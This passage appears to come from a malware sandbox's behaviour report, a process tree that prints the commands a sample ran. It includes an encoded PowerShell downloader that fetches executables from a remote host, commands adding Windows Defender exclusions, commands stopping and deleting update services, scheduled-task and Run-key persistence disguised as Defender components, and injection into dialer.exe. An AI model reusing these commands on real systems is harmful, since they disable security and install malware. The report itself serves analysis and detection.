vAGMAbwBuAG4AZQBjAHQAMgBtAGUALgBkAGQAbgBzAC4AbgBlAHQALwB3AG8AdwAvADEALwAyAC8AMwAvADQALwA1AC8ANgAvADcALwBTAHkAcwBBAHAAcAAuAGUAeABlACcALAAgADwAIwBsAHAAcQAjAD4AIAAoAEoAbwBpAG4ALQBQAGEAdABoACAAPAAjAHkAcwBjACMAPgAgAC0AUABhAHQAaAAgACQAZQBuAHYAOgBUAGUAbQBwACAAPAAjAHcAbQB0ACMAPgAgAC0AQwBoAGkAbABkAFAAYQB0AGgAIAAnAFMAeQBzAEEAcABwAC4AZQB4AGUAJwApACkAPAAjAG4AdABrACMAPgA7ACAAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQARgBpAGwAZQAoACcAaAB0AHQAcABzADoALwAvAGMAbwBuAG4AZQBjAHQAMgBtAGUALgBkAGQAbgBzAC4AbgBlAHQALwB3AG8AdwAvADEALwAyAC8AMwAvADQALwA1AC8ANgAvADcALwBTAG0AYQByAHQARABlAGYAUgB1AG4ALgBlAHgAZQAnACwAIAA8ACMAegB6AGwAIwA+ACAAKABKAG8AaQBuAC0AUABhAHQAaAAgADwAIwB5AGgAbAAjAD4AIAAtAFAAYQB0AGgAIAAkAGUAbgB2ADoAVABlAG0AcAAgADwAIwBtAHgAcgAjAD4AIAAtAEMAaABpAGwAZABQAGEAdABoACAAJwBTAG0AYQByAHQARABlAGYAUgB1AG4ALgBlAHgAZQAnACkAKQA8ACMAcQB4AHoAIwA+ADsAIABTAHQAYQByAHQALQBQAHIAbwBjAGUAcwBzACAALQBGAGkAbABlAFAAYQB0AGgAIAA8ACMAagB0AG0AIwA+ACAAKABKAG8AaQBuAC0AUABhAHQAaAAgAC0AUABhAHQAaAAgACQAZQBuAHYAOgBUAGUAbQBwACAAPAAjAHoAYwBsACMAPgAgAC0AQwBoAGkAbABkAFAAYQB0AGgAIAAnAEMANABMAG8AYQBkAGUAcgAuAGUAeABlACcAKQA8ACMAaABxAGgAIwA+ADsAIABTAHQAYQByAHQALQBQAHIAbwBjAGUAcwBzACAALQBGAGkAbABlAFAAYQB0AGgAIAA8ACMAYwBnAGEAIwA+ACAAKABKAG8AaQBuAC0AUABhAHQAaAAgAC0AUABhAHQAaAAgACQAZQBuAHYAOgBUAGUAbQBwACAAPAAjAGIAawB3ACMAPgAgAC0AQwBoAGkAbABkAFAAYQB0AGgAIAAnAG4AZQB3ADIALgBlAHgAZQAnACkAPAAjAGsAcgBwACMAPgA7ACAAUwB0AGEAcgB0AC0AUAByAG8AYwBlAHMAcwAgAC0ARgBpAGwAZQBQAGEAdABoACAAPAAjAHYAbQByACMAPgAgACgASgBvAGkAbgAtAFAAYQB0AGgAIAAtAFAAYQB0AGgAIAAkAGUAbgB2ADoAVABlAG0AcAAgADwAIwBhAHgAagAjAD4AIAAtAEMAaABpAGwAZABQAGEAdABoACAAJwBTAHkAcwBBAHAAcAAuAGUAeABlACcAKQA8ACMAZgBiAGIAIwA+ADsAIABTAHQAYQByAHQALQBQAHIAbwBjAGUAcwBzACAALQBGAGkAbABlAFAAYQB0AGgAIAA8ACMAdABmAG0AIwA+ACAAKABKAG8AaQBuAC0AUABhAHQAaAAgAC0AUABhAHQAaAAgACQAZQBuAHYAOgBUAGUAbQBwACAAPAAjAHoAaQB3ACMAPgAgAC0AQwBoAGkAbABkAFAAYQB0AGgAIAAnAFMAbQBhAHIAdABEAGUAZgBSAHUAbgAuAGUAeABlACcAKQA8ACMAYgBwAHMAIwA+AA=="
7⤵
- Blocklisted process makes network request
- Loads dropped DLL
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2032

C:\Users\Admin\AppData\Local\Temp\C4Loader.exe
"C:\Users\Admin\AppData\Local\Temp\C4Loader.exe"
8⤵
PID:1832

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 1832 -s 36
9⤵
- Program crash
PID:1188

C:\Users\Admin\AppData\Local\Temp\new2.exe
"C:\Users\Admin\AppData\Local\Temp\new2.exe"
8⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
PID:240

C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe"
9⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1492

C:\Users\Admin\AppData\Local\Temp\SysApp.exe
"C:\Users\Admin\AppData\Local\Temp\SysApp.exe"
8⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
PID:1956

C:\Users\Admin\AppData\Local\Temp\SmartDefRun.exe
"C:\Users\Admin\AppData\Local\Temp\SmartDefRun.exe"
8⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
- Drops file in Drivers directory
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Drops file in Program Files directory
- Suspicious behavior: EnumeratesProcesses
PID:660

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 1800 -s 36
6⤵
- Program crash
PID:1980

C:\Users\Admin\AppData\Local\Temp\new2.exe
"C:\Users\Admin\AppData\Local\Temp\new2.exe"
5⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious use of WriteProcessMemory
PID:1676

C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe"
6⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:624

C:\Users\Admin\AppData\Local\Temp\SysApp.exe
"C:\Users\Admin\AppData\Local\Temp\SysApp.exe"
5⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
PID:308

C:\Windows\SysWOW64\schtasks.exe
/C /create /F /sc minute /mo 1 /tn "Telemetry Logging" /tr "C:\Users\Admin\AppData\Roaming\Microsoft\TelemetryServices\fodhelper.exe"
6⤵
- Creates scheduled task(s)
PID:1532

C:\Users\Admin\AppData\Local\Temp\SmartDefRun.exe
"C:\Users\Admin\AppData\Local\Temp\SmartDefRun.exe"
5⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
- Drops file in Drivers directory
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Drops file in Program Files directory
- Suspicious behavior: EnumeratesProcesses
PID:436

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 1128 -s 36
3⤵
- Program crash
PID:1316

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force
2⤵
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:956

C:\Windows\System32\cmd.exe
C:\Windows\System32\cmd.exe /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\wuauserv" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\bits" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\dosvc" /f
2⤵
- Suspicious use of WriteProcessMemory
PID:1384

C:\Windows\System32\sc.exe
sc stop UsoSvc
3⤵
- Launches sc.exe
PID:1712

C:\Windows\System32\sc.exe
sc stop WaaSMedicSvc
3⤵
- Launches sc.exe
PID:948

C:\Windows\System32\sc.exe
sc stop wuauserv
3⤵
- Launches sc.exe
PID:1940

C:\Windows\System32\sc.exe
sc stop bits
3⤵
- Launches sc.exe
PID:2032

C:\Windows\System32\sc.exe
sc stop dosvc
3⤵
- Launches sc.exe
PID:1616

C:\Windows\System32\reg.exe
reg delete "HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc" /f
3⤵
PID:2028

C:\Windows\System32\reg.exe
reg delete "HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc" /f
3⤵
PID:1000

C:\Windows\System32\reg.exe
reg delete "HKLM\SYSTEM\CurrentControlSet\Services\wuauserv" /f
3⤵
- Modifies security service
PID:1484

C:\Windows\System32\reg.exe
reg delete "HKLM\SYSTEM\CurrentControlSet\Services\bits" /f
3⤵
PID:1316

C:\Windows\System32\reg.exe
reg delete "HKLM\SYSTEM\CurrentControlSet\Services\dosvc" /f
3⤵
PID:1128

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#nefucvtr#> IF((New-Object Security.Principal.WindowsPrincipal([Security.Principal.WindowsIdentity]::GetCurrent())).IsInRole([Security.Principal.WindowsBuiltInRole]::Administrator)) { IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /ru 'System' /tn 'WindowsDefenderSmartScreenQC' /tr '''C:\Program Files\WindowsDefenderQC\Defender\SmartScreenQC.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Program Files\WindowsDefenderQC\Defender\SmartScreenQC.exe') -Trigger (New-ScheduledTaskTrigger -AtStartup) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'WindowsDefenderSmartScreenQC' -User 'System' -RunLevel 'Highest' -Force; } } Else { reg add "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "WindowsDefenderSmartScreenQC" /t REG_SZ /f /d 'C:\Program Files\WindowsDefenderQC\Defender\SmartScreenQC.exe' }
2⤵
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1516

C:\Windows\system32\schtasks.exe
"C:\Windows\system32\schtasks.exe" /create /f /sc onlogon /rl highest /ru System /tn WindowsDefenderSmartScreenQC /tr "'C:\Program Files\WindowsDefenderQC\Defender\SmartScreenQC.exe'"
3⤵
- Creates scheduled task(s)
PID:1564

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#waqsnj#> IF((New-Object Security.Principal.WindowsPrincipal([Security.Principal.WindowsIdentity]::GetCurrent())).IsInRole([Security.Principal.WindowsBuiltInRole]::Administrator)) { schtasks /run /tn "WindowsDefenderSmartScreenQC" } Else { "C:\Program Files\WindowsDefenderQC\Defender\SmartScreenQC.exe" }
2⤵
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:692

C:\Windows\system32\schtasks.exe
"C:\Windows\system32\schtasks.exe" /run /tn WindowsDefenderSmartScreenQC
3⤵
PID:1964

C:\Windows\System32\dialer.exe
C:\Windows\System32\dialer.exe
2⤵
PID:1884

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force
2⤵
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1128

C:\Windows\System32\cmd.exe
C:\Windows\System32\cmd.exe /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\wuauserv" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\bits" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\dosvc" /f
2⤵
PID:856

C:\Windows\System32\sc.exe
sc stop UsoSvc
3⤵
- Launches sc.exe
PID:1856

C:\Windows\System32\sc.exe
sc stop WaaSMedicSvc
3⤵
- Launches sc.exe
PID:1596

C:\Windows\System32\sc.exe
sc stop wuauserv
3⤵
- Launches sc.exe
PID:2008

C:\Windows\System32\sc.exe
sc stop bits
3⤵
- Launches sc.exe
PID:1760

C:\Windows\System32\sc.exe
sc stop dosvc
3⤵
- Launches sc.exe
PID:760

C:\Windows\System32\reg.exe
reg delete "HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc" /f
3⤵
PID:304

C:\Windows\System32\reg.exe
reg delete "HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc" /f
3⤵
PID:892

C:\Windows\System32\reg.exe
reg delete "HKLM\SYSTEM\CurrentControlSet\Services\wuauserv" /f
3⤵
PID:1944

C:\Windows\System32\reg.exe
reg delete "HKLM\SYSTEM\CurrentControlSet\Services\bits" /f
3⤵
PID:1528

C:\Windows\System32\reg.exe
reg delete "HKLM\SYSTEM\CurrentControlSet\Services\dosvc" /f
3⤵
PID:820

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#nefucvtr#> IF((New-Object Security.Principal.WindowsPrincipal([Security.Principal.WindowsIdentity]::GetCurrent())).IsInRole([Security.Principal.WindowsBuiltInRole]::Administrator)) { IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /ru 'System' /tn 'WindowsDefenderSmartScreenQC' /tr '''C:\Program Files\WindowsDefenderQC\Defender\SmartScreenQC.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Program Files\WindowsDefenderQC\Defender\SmartScreenQC.exe') -Trigger (New-ScheduledTaskTrigger -AtStartup) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'WindowsDefenderSmartScreenQC' -User 'System' -RunLevel 'Highest' -Force; } } Else { reg add "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "WindowsDefenderSmartScreenQC" /t REG_SZ /f /d 'C:\Program Files\WindowsDefenderQC\Defender\SmartScreenQC.exe' }
2⤵
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2036

C:\Windows\system32\schtasks.exe
"C:\Windows\system32\schtasks.exe" /create /f /sc onlogon /rl highest /ru System /tn WindowsDefenderSmartScreenQC /tr "'C:\Program Files\WindowsDefenderQC\Defender\SmartScreenQC.exe'"
3⤵
- Creates scheduled task(s)
PID:1928

C:\Windows\System32\dialer.exe
C:\Windows\System32\dialer.exe
2⤵
PID:956

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#waqsnj#> IF((New-Object Security.Principal.WindowsPrincipal([Security.Principal.WindowsIdentity]::GetCurrent())).IsInRole([Security.Principal.WindowsBuiltInRole]::Administrator)) { schtasks /run /tn "WindowsDefenderSmartScreenQC" } Else { "C:\Program Files\WindowsDefenderQC\Defender\SmartScreenQC.exe" }
2⤵
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1732

C:\Windows\system32\schtasks.exe
"C:\Windows\system32\schtasks.exe" /run /tn WindowsDefenderSmartScreenQC
3⤵
PID:1408

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force
2⤵
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:856

C:\Windows\System32\cmd.exe
C:\Windows\System32\cmd.exe /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\wuauserv" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\bits" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\dosvc" /f
2⤵
PID:1692

C:\Windows\System32\sc.exe
sc stop UsoSvc
3⤵
- Launches sc.exe
PID:1568

C:\Windows\System32\sc.exe
sc stop WaaSMedicSvc
3⤵
- Launches sc.exe
PID:1396

C:\Windows\System32\sc.exe
sc stop wuauserv
3⤵
- Launches sc.exe
PID:2032

C:\Windows\System32\sc.exe
sc stop bits
3⤵
- Launches sc.exe
PID:484

C:\Windows\System32\sc.exe
sc stop dosvc
3⤵
- Launches sc.exe
PID:1972

C:\Windows\System32\reg.exe
reg delete "HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc" /f
3⤵
PID:1820

C:\Windows\System32\reg.exe
reg delete "HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc" /f
3⤵
PID:1316

C:\Windows\System32\reg.exe
reg delete "HKLM\SYSTEM\CurrentControlSet\Services\wuauserv" /f
3⤵
PID:1748

C:\Windows\System32\reg.exe
reg delete "HKLM\SYSTEM\CurrentControlSet\Services\bits" /f
3⤵
PID:360

C:\Windows\System32\reg.exe
reg delete "HKLM\SYSTEM\CurrentControlSet\Services\dosvc" /f
3⤵
PID:1524

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#nefucvtr#> IF((New-Object Security.Principal.WindowsPrincipal([Security.Principal.WindowsIdentity]::GetCurrent())).IsInRole([Security.Principal.WindowsBuiltInRole]::Administrator)) { IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /ru 'System' /tn 'WindowsDefenderSmartScreenQC' /tr '''C:\Program Files\WindowsDefenderQC\Defender\SmartScreenQC.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Program Files\WindowsDefenderQC\Defender\SmartScreenQC.exe') -Trigger (New-ScheduledTaskTrigger -AtStartup) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'WindowsDefenderSmartScreenQC' -User 'System' -RunLevel 'Highest' -Force; } } Else { reg add "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "WindowsDefenderSmartScreenQC" /t REG_SZ /f /d 'C:\Program Files\WindowsDefenderQC\Defender\SmartScreenQC.exe' }
2⤵
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:816

C:\Windows\system32\schtasks.exe
"C:\Windows\system32\schtasks.exe" /create /f /sc onlogon /rl highest /ru System /tn WindowsDefenderSmartScreenQC /tr "'C:\Program Files\WindowsDefenderQC\Defender\SmartScreenQC.exe'"
3⤵
- Creates scheduled task(s)
PID:1440

C:\Windows\System32\dialer.exe
C:\Windows\System32\dialer.exe ovyftblehadxh
2⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
PID:1964

C:\Windows\System32\cmd.exe
C:\Windows\System32\cmd.exe /c wmic PATH Win32_VideoController GET Name, VideoProcessor > "C:\Program Files\Google\Libs\g.log"
2⤵
- Drops file in Program Files directory
PID:1000

C:\Windows\System32\Wbem\WMIC.exe
wmic PATH Win32_VideoController GET Name, VideoProcessor
3⤵
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
PID:1708

C:\Windows\System32\cmd.exe
C:\Windows\System32\cmd.exe /c wmic PATH Win32_VideoController GET Name, VideoProcessor > "C:\Program Files\Google\Libs\g.log"
2⤵
- Drops file in Program Files directory
PID:660

C:\Windows\System32\dialer.exe
C:\Windows\System32\dialer.exe dazvaqbeggbsgujt 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
2⤵
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
PID:924

C:\Windows\system32\taskeng.exe
